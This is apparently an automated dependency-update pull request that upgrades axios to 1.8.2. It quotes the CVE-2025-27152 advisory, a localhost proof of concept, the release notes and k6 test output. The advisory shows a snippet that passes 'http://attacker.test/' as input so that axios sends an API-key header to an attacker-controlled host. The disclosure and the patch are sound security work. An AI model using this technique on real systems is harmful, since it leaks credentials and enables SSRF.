Update dependency axios to v1.8.2 [SECURITY]

[openverse-bot]

This PR contains the following updates:

Package	Type	Update	Change
axios (source)	dependencies	minor	1.7.9 -> 1.8.2

GitHub Vulnerability Alerts

CVE-2025-27152

Summary

A previously reported issue in axios demonstrated that using protocol-relative URLs could lead to SSRF (Server-Side Request Forgery).
Reference: axios/axios#6463

A similar problem that occurs when passing absolute URLs rather than protocol-relative URLs to axios has been identified. Even if ⁠baseURL is set, axios sends the request to the specified absolute URL, potentially causing SSRF and credential leakage. This issue impacts both server-side and client-side usage of axios.

Details

Consider the following code snippet:

import axios from "axios";

const internalAPIClient = axios.create({
  baseURL: "http://example.test/api/v1/users/",
  headers: {
    "X-API-KEY": "1234567890",
  },
});

// const userId = "123";
const userId = "http://attacker.test/";

await internalAPIClient.get(userId); // SSRF

In this example, the request is sent to http://attacker.test/ instead of the baseURL. As a result, the domain owner of attacker.test would receive the X-API-KEY included in the request headers.

It is recommended that:

• When baseURL is set, passing an absolute URL such as http://attacker.test/ to get() should not ignore baseURL.
• Before sending the HTTP request (after combining the baseURL with the user-provided parameter), axios should verify that the resulting URL still begins with the expected baseURL.

PoC

Follow the steps below to reproduce the issue:

1. Set up two simple HTTP servers:

mkdir /tmp/server1 /tmp/server2
echo "this is server1" > /tmp/server1/index.html 
echo "this is server2" > /tmp/server2/index.html
python -m http.server -d /tmp/server1 10001 &
python -m http.server -d /tmp/server2 10002 &

2. Create a script (e.g., main.js):

import axios from "axios";
const client = axios.create({ baseURL: "http://localhost:10001/" });
const response = await client.get("http://localhost:10002/");
console.log(response.data);

3. Run the script:

$ node main.js
this is server2

Even though baseURL is set to http://localhost:10001/, axios sends the request to http://localhost:10002/.

Impact

• Credential Leakage: Sensitive API keys or credentials (configured in axios) may be exposed to unintended third-party hosts if an absolute URL is passed.
• SSRF (Server-Side Request Forgery): Attackers can send requests to other internal hosts on the network where the axios program is running.
• Affected Users: Software that uses baseURL and does not validate path parameters is affected by this issue.

---

Release Notes

axios/axios (axios)

v1.8.2

Compare Source

Bug Fixes

• http-adapter: add allowAbsoluteUrls to path building (#​6810) (fb8eec2)

Contributors to this release

• Fasoro-Joseph Alexander

v1.8.1

Compare Source

Bug Fixes

• utils: move generateString to platform utils to avoid importing crypto module into client builds; (#​6789) (36a5a62)

Contributors to this release

• Dmitriy Mozgovoy

v1.8.0

Compare Source

Bug Fixes

• examples: application crashed when navigating examples in browser (#​5938) (1260ded)
• missing word in SUPPORT_QUESTION.yml (#​6757) (1f890b1)
• utils: replace getRandomValues with crypto module (#​6788) (23a25af)

Features

• Add config for ignoring absolute URLs (#​5902) (#​6192) (32c7bcc)

Reverts

• Revert "chore: expose fromDataToStream to be consumable (#​6731)" (#​6732) (1317261), closes #​6731 #​6732

BREAKING CHANGES

• code relying on the above will now combine the URLs instead of prefer request URL

• feat: add config option for allowing absolute URLs

• fix: add default value for allowAbsoluteUrls in buildFullPath

• fix: typo in flow control when setting allowAbsoluteUrls

Contributors to this release

• Michael Toscano
• Willian Agostini
• Naron
• shravan || श्रvan
• Justin Dhillon
• yionr
• Shin'ya Ueoka
• Dan Dascalescu
• Nitin Ramnani
• Shay Molcho
• Jay
• fancy45daddy
• Habip Akyol
• Bailey Lissington
• Bernardo da Eira Duarte
• Shivam Batham
• Lipin Kariappa

1.7.9 (2024-12-04)

Reverts

• Revert "fix(types): export CJS types from ESM (#​6218)" (#​6729) (c44d2f2), closes #​6218 #​6729

Contributors to this release

• Jay

1.7.8 (2024-11-25)

Bug Fixes

• allow passing a callback as paramsSerializer to buildURL (#​6680) (eac4619)
• core: fixed config merging bug (#​6668) (5d99fe4)
• fixed width form to not shrink after 'Send Request' button is clicked (#​6644) (7ccd5fd)
• http: add support for File objects as payload in http adapter (#​6588) (#​6605) (6841d8d)
• http: fixed proxy-from-env module import (#​5222) (12b3295)
• http: use globalThis.TextEncoder when available (#​6634) (df956d1)
• ios11 breaks when build (#​6608) (7638952)
• types: add missing types for mergeConfig function (#​6590) (00de614)
• types: export CJS types from ESM (#​6218) (c71811b)
• updated stream aborted error message to be more clear (#​6615) (cc3217a)
• use URL API instead of DOM to fix a potential vulnerability warning; (#​6714) (0a8d6e1)

Contributors to this release

• Remco Haszing
• Jay
• Aayush Yadav
• Dmitriy Mozgovoy
• Ell Bradshaw
• Amit Saini
• Tommaso Paulon
• Akki
• Sampo Silvennoinen
• Kasper Isager Dalsgarð
• Christian Clauss
• Pavan Welihinda
• Taylor Flatt
• Kenzo Wada
• Ngole Lawson
• Haven
• Shrivali Dutt
• Henco Appel

1.7.7 (2024-08-31)

Bug Fixes

• fetch: fix stream handling in Safari by fallback to using a stream reader instead of an async iterator; (#​6584) (d198085)
• http: fixed support for IPv6 literal strings in url (#​5731) (364993f)

Contributors to this release

• Rishi556
• Dmitriy Mozgovoy

1.7.6 (2024-08-30)

Bug Fixes

• fetch: fix content length calculation for FormData payload; (#​6524) (085f568)
• fetch: optimize signals composing logic; (#​6582) (df9889b)

Contributors to this release

• Dmitriy Mozgovoy
• Jacques Germishuys
• kuroino721

1.7.5 (2024-08-23)

Bug Fixes

• adapter: fix undefined reference to hasBrowserEnv (#​6572) (7004707)
• core: add the missed implementation of AxiosError#status property; (#​6573) (6700a8a)
• core: fix ReferenceError: navigator is not defined for custom environments; (#​6567) (fed1a4b)
• fetch: fix credentials handling in Cloudflare workers (#​6533) (550d885)

Contributors to this release

• Dmitriy Mozgovoy
• Antonin Bas
• Hans Otto Wirtz

1.7.4 (2024-08-13)

Bug Fixes

• sec: CVE-2024-39338 (#​6539) (#​6543) (6b6b605)
• sec: disregard protocol-relative URL to remediate SSRF (#​6539) (07a661a)

Contributors to this release

• Lev Pachmanov
• Đỗ Trọng Hải

1.7.3 (2024-08-01)

Bug Fixes

• adapter: fix progress event emitting; (#​6518) (e3c76fc)
• fetch: fix withCredentials request config (#​6505) (85d4d0e)
• xhr: return original config on errors from XHR adapter (#​6515) (8966ee7)

Contributors to this release

• Dmitriy Mozgovoy
• Valerii Sidorenko
• prianYu

1.7.2 (2024-05-21)

Bug Fixes

• fetch: enhance fetch API detection; (#​6413) (4f79aef)

Contributors to this release

• Dmitriy Mozgovoy

1.7.1 (2024-05-20)

Bug Fixes

• fetch: fixed ReferenceError issue when TextEncoder is not available in the environment; (#​6410) (733f15f)

Contributors to this release

• Dmitriy Mozgovoy

---

Configuration

📅 Schedule: Branch creation - At any time (no schedule defined), Automerge - At any time (no schedule defined).

🚦 Automerge: Enabled.

♻ Rebasing: Whenever PR is behind base branch, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about these updates again.

---

• If you want to rebase/retry this PR, check this box

---

This PR has been generated by Renovate Bot.

[github-actions]

Latest k6 run output¹

     ✓ status was 200

     checks.........................: 100.00% ✓ 414      ✗ 0   
     data_received..................: 96 MB   399 kB/s
     data_sent......................: 54 kB   224 B/s
     http_req_blocked...............: avg=45.32µs  min=2.39µs   med=4.79µs   max=1.45ms   p(90)=144.33µs p(95)=183.15µs
     http_req_connecting............: avg=32.2µs   min=0s       med=0s       max=1.42ms   p(90)=97.86µs  p(95)=140.15µs
     http_req_duration..............: avg=155.86ms min=18.41ms  med=93.57ms  max=1.03s    p(90)=369.92ms p(95)=465.98ms
       { expected_response:true }...: avg=155.86ms min=18.41ms  med=93.57ms  max=1.03s    p(90)=369.92ms p(95)=465.98ms
   ✓ http_req_failed................: 0.00%   ✓ 0        ✗ 414 
     http_req_receiving.............: avg=162.06µs min=53.05µs  med=138.48µs max=555.26µs p(90)=244.78µs p(95)=302.44µs
     http_req_sending...............: avg=25.05µs  min=9.36µs   med=22.42µs  max=115.7µs  p(90)=37.2µs   p(95)=46.94µs 
     http_req_tls_handshaking.......: avg=0s       min=0s       med=0s       max=0s       p(90)=0s       p(95)=0s      
     http_req_waiting...............: avg=155.67ms min=18.29ms  med=93.32ms  max=1.03s    p(90)=369.71ms p(95)=465.7ms 
     http_reqs......................: 414     1.717308/s
     iteration_duration.............: avg=844.76ms min=330.56ms med=868.32ms max=1.67s    p(90)=1.11s    p(95)=1.39s   
     iterations.....................: 77      0.319403/s
     vus............................: 3       min=0      max=6 
     vus_max........................: 60      min=60     max=60

Footnotes

1. This comment will automatically update with new output each time k6 runs for this PR ↩